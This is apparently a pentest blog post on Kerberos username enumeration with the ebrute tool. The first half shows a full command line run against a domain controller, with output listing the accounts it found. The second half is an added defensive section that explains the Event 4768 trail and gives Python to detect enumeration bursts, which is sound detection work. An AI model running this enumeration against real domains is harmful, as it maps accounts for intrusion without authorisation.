So we’ve all played with RID cycling and GetAcct.exe, but lately I guess we’ve not been pulling those out of our bag. Protection against them is now standard, so we need a new way to enumerate usernames against a given domain.
New info on this website is pointing towards a tool called ebrute that enumerates usernames over Kerberos without having to make a password guess. On a decent machine against a decent server you’ll hopefully achieve 1,000,000 guesses per minute. Each guess is sent as a single UDP packet that has been stripped down to be as small as possible. Download the tool and make sure you have .Net version 2 or greater installed.
Then it’s just a simple case of running the tool against the domain:

C:\ebrute>ebrute.exe -r kerbenum -P users.txt -h 192.168.100.1 -e example.com -t 32
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Username not specified (normal behavior for some plugins - lets do joey checks)
Added:    20,973 user(s), 0 password(s), 1 host(s),  + joeycheck 20,973 tasks over 32 thread/s.
Starting: 20/12/2011 11:07:04
[9]  HOST: '192.168.100.1' | USER: 'administrator' | PASS: 'administrator' | EXTRA: 'example.com' | Return code: 'Success' []
[21]  HOST: '192.168.100.1' | USER: 'guest' | PASS: 'guest' | EXTRA: 'example.com' | Return code: 'Disabled' []
[28]  HOST: '192.168.100.1' | USER: 'Myuser10' | PASS: 'Myuser10' | EXTRA: 'example.com' | Return code: 'Success' []
[30]  HOST: '192.168.100.1' | USER: 'MyUser100' | PASS: 'MyUser100' | EXTRA: 'example.com' | Return code: 'Success' []
[13]  HOST: '192.168.100.1' | USER: 'myuser34' | PASS: 'myuser34' | EXTRA: 'example.com' | Return code: 'Success' []
[5]  HOST: '192.168.100.1' | USER: '0,173648178' | PASS: '0,173648178' | EXTRA: 'example.com' | Return code: 'Unknown' [Error, possibly reduce threds (Attempt 1/5)]
Complete: 20/12/2011 11:07:12
Stats:    00:00:07    (~169,550 tasks/minute) (Performed 20,973 / 20,973 tasks)
Summary of Authentication Successes:
HOST: '192.168.100.1' | USER: 'administrator' | PASS: 'administrator' | EXTRA: 'example.com' | Return code: 'Success'
HOST: '192.168.100.1' | USER: 'guest' | PASS: 'guest' | EXTRA: 'example.com' | Return code: 'Disabled'
HOST: '192.168.100.1' | USER: 'Myuser10' | PASS: 'Myuser10' | EXTRA: 'example.com' | Return code: 'Success'
HOST: '192.168.100.1' | USER: 'MyUser100' | PASS: 'MyUser100' | EXTRA: 'example.com' | Return code: 'Success'
HOST: '192.168.100.1' | USER: 'myuser34' | PASS: 'myuser34' | EXTRA: 'example.com' | Return code: 'Success'

Simples
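Every one of those single-packet probes has to be answered by the domain controller, so the technique leaves a trail on the defending side. When the DC audits Kerberos Authentication Service failures, an AS-REQ for a name that does not exist is logged as Event ID 4768 with Result Code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN); an existing account never produces that code (a disabled one gives 0x12, KDC_ERR_CLIENT_REVOKED, which is what sits behind the 'Disabled' row above, while the 'Success' rows simply mean the KDC recognised the principal, since no real password is being guessed). The Python below is an added example, not part of the post or of ebrute: it parses a constructed, simplified one-line rendering of 4768 records (the field names follow the event's XML, the line layout is an assumption) and raises an alert for any source IP that accumulates a threshold of unknown-principal failures inside a sliding window.

```python
"""Spot Kerberos username-enumeration bursts in domain controller audit records.

Added example, not part of the original post or of the ebrute tool. It assumes
the DC logs Kerberos Authentication Service failures, so that an AS-REQ for a
non-existent principal appears as Event ID 4768 with Result Code 0x6.
"""
from collections import defaultdict, deque
from datetime import datetime

# Result code that only an unknown principal produces; the enumeration signal.
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"

# Constructed sample: a simplified one-line rendering of 4768 records, not a
# real export. 192.168.100.50 sweeps a wordlist in a few seconds; .77 is a
# user who mistyped their name twice, minutes apart.
SAMPLE_LOG = """\
2011-12-20T11:07:04 EventID=4768 TargetUserName=administrator IpAddress=::ffff:192.168.100.50 ResultCode=0x0
2011-12-20T11:07:04 EventID=4768 TargetUserName=joey IpAddress=::ffff:192.168.100.50 ResultCode=0x6
2011-12-20T11:07:04 EventID=4768 TargetUserName=jsmith IpAddress=::ffff:192.168.100.50 ResultCode=0x6
2011-12-20T11:07:05 EventID=4768 TargetUserName=guest IpAddress=::ffff:192.168.100.50 ResultCode=0x12
2011-12-20T11:07:05 EventID=4768 TargetUserName=sales1 IpAddress=::ffff:192.168.100.50 ResultCode=0x6
2011-12-20T11:07:06 EventID=4768 TargetUserName=sales2 IpAddress=::ffff:192.168.100.50 ResultCode=0x6
2011-12-20T11:07:06 EventID=4768 TargetUserName=backup IpAddress=::ffff:192.168.100.50 ResultCode=0x6
2011-12-20T11:07:08 EventID=4768 TargetUserName=printsvc IpAddress=::ffff:192.168.100.50 ResultCode=0x6
2011-12-20T11:07:11 EventID=4768 TargetUserName=helpdesk IpAddress=::ffff:192.168.100.50 ResultCode=0x6
2011-12-20T11:03:30 EventID=4768 TargetUserName=m.yuser IpAddress=::ffff:192.168.100.77 ResultCode=0x6
2011-12-20T11:09:10 EventID=4768 TargetUserName=myusr IpAddress=::ffff:192.168.100.77 ResultCode=0x6
2011-12-20T11:09:12 EventID=4768 TargetUserName=myuser34 IpAddress=::ffff:192.168.100.77 ResultCode=0x0
"""


def normalize_ip(ip):
    """4768 records usually carry IPv4-mapped addresses such as ::ffff:10.0.0.1."""
    return ip[7:] if ip.startswith("::ffff:") else ip


def parse_event(line):
    """Turn one 'timestamp key=value ...' line into a dict with a datetime."""
    ts, *fields = line.split()
    rec = {"timestamp": datetime.fromisoformat(ts)}
    for field in fields:
        key, _, value = field.partition("=")
        rec[key] = value
    return rec


def parse_log(text):
    return [parse_event(line) for line in text.splitlines() if line.strip()]


def detect_enumeration(events, window_seconds=60, threshold=5):
    """Return one alert per source IP whose unknown-principal failures reach
    `threshold` inside any sliding window of `window_seconds`."""
    events = sorted(events, key=lambda e: e["timestamp"])
    window = defaultdict(deque)  # ip -> (timestamp, username) of recent 0x6 failures
    alerts = {}
    for ev in events:
        if ev.get("EventID") != "4768" or ev.get("ResultCode") != KDC_ERR_C_PRINCIPAL_UNKNOWN:
            continue
        ip = normalize_ip(ev["IpAddress"])
        q = window[ip]
        q.append((ev["timestamp"], ev["TargetUserName"]))
        # Drop failures that have fallen out of the window.
        while (q[-1][0] - q[0][0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            prev = alerts.get(ip)
            if prev is None or len(q) > prev["count"]:
                alerts[ip] = {
                    "ip": ip,
                    "count": len(q),
                    "first_seen": q[0][0].isoformat(),
                    "usernames": sorted({name for _, name in q}),
                }
    return [alerts[ip] for ip in sorted(alerts)]


if __name__ == "__main__":
    for alert in detect_enumeration(parse_log(SAMPLE_LOG)):
        print(f"{alert['ip']}: {alert['count']} unknown principals since "
              f"{alert['first_seen']}: {', '.join(alert['usernames'])}")
```

The threshold is deliberately low here because a legitimate user rarely mistypes their own name more than a couple of times a minute, whereas the run shown above manages around 169,550 tasks per minute and would trip even a generous limit within its first second. Disabled accounts (0x12) are left out of the count on purpose: they are valid principals, and folding them in only adds noise from people locked out for ordinary reasons.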
